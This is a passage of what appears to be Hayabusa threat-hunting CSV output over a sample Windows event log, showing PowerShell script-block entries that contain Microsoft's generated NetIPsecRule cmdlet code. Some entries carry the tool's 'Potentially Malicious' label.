'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) 
$__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName ))",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"Name='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters 
$__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) 
{ $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', 
$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName 
))",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"{ $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecRule' -Alias '*' function Set-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecIn')] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${User}, [Parameter(ParameterSetName='ByIPsecRuleName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Machine}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"{ $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 
